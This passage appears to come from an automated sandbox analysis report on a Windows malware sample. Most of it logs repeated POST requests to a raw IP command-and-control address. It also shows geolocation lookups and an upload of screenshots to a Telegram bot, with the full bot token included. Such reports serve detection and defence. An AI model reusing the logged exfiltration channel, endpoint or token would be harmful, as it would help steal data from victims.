                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2128Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2548Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2548Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2140Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2128Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2140Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2544Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2128Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002ACB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ymail.google.com;example.com;any.domain.net;youtube.com;www.youtube.com;store.steampowered.com;steampowered.com;steam.com; equals www.youtube.com (Youtube)
                            Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                            Source: unknownHTTP traffic detected: POST /bot7829111840:AAGwC163Z3bte6z_YuN643yX5LplCCYUaLM/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="34997188-a42f-41eb-990d-cfd33339eec7"Host: api.telegram.orgContent-Length: 86200Expect: 100-continueConnection: Keep-Alive
                            Source: powershell.exe, 00000040.00000002.2903448372.00000164CC7BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                            Source: powershell.exe, 00000040.00000002.2903448372.00000164CC7BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2260842550.000000001D838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                            Source: svchost.exe, 0000004F.00000003.2444686605.000001C427480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                            Source: powershell.exe, 00000046.00000002.2899814464.0000023F80227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000002.00000002.2286246823.0000018037D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984329000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E3AE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E22068000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E13F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCF67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2286246823.0000018037B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E38C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E21E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E11D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.3219775689.000001F6120B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2886040639.0000018180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.3511417406.0000016822BD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.3259951458.0000019354D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.3268697288.000002A1BE461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.3495706955.00000164CE721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.3507396549.000001B712461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2882983145.000001F700001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000002.00000002.2286246823.0000018037D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984329000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E3AE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E22068000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E13F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCF67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: powershell.exe, 00000046.00000002.2899814464.0000023F80227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 00000002.00000002.2286246823.0000018037B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E38C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E21E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E11D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.3219775689.000001F6120B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2886040639.0000018180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.3511417406.0000016822BD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 